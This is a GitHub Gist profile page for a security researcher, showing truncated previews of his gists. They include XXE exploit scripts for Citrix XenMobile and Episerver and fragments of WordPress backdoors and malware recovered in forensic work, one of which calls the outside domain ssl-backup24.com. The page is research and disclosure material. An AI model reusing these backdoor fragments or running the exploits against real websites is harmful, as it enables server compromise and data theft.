Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

Jonas Lejon jonaslejon

🏠
Working from home
View GitHub Profile
@jonaslejon
jonaslejon / wp-config-sample.php
Created Mar 24, 2020
WordPress with Phpsploit backdoor
View wp-config-sample.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
@jonaslejon
jonaslejon / custom.list.chroot
Created Jan 24, 2020
My custom Kali Linux package list for building the live ISO
View custom.list.chroot
python-usb
python3-usb
mingw-w64
isc-dhcp-server
bridge-utils
libdbus-1-dev
libdbus-glib-1-dev
python3-venv
dirbuster
cmake
@jonaslejon
jonaslejon / xenxxe.py
Last active Aug 10, 2020
Citrix XenMobile XXE Exploit
View xenxxe.py
#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
@jonaslejon
jonaslejon / gist:229e96e45bcb527cdf63b8ee930687af
Last active Feb 17, 2020
RSA PGP key for info@wpsec.com
View gist:229e96e45bcb527cdf63b8ee930687af
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A
WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k
j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s
gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU
3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9
Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE
5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG
cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+
@jonaslejon
jonaslejon / dns-resolvers.txt
Last active Jun 25, 2018
DNS Resolvers with tcpdump output
View dns-resolvers.txt
## Resolver 1 Bahnhof
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)
@jonaslejon
jonaslejon / episploit.py
Last active Aug 28, 2018
Episerver XXE Vulnerability - Exploit Episploit
View episploit.py
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-to-read]
@jonaslejon
jonaslejon / wp-uninstall.php
Created Apr 8, 2018
WordPress backdoor found in file wp-uninstall.php
View wp-uninstall.php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
@jonaslejon
jonaslejon / _input__test.php.
Created Oct 10, 2017
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
View _input__test.php.
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
@jonaslejon
jonaslejon / wp-blog-header.php
Last active Jul 7, 2018
Malware found on WordPress installation. This is the deobfuscated version
View wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
@jonaslejon
jonaslejon / file-upload.php
Created Feb 10, 2016
PHP file upload backdoor
View file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
You can’t perform that action at this time.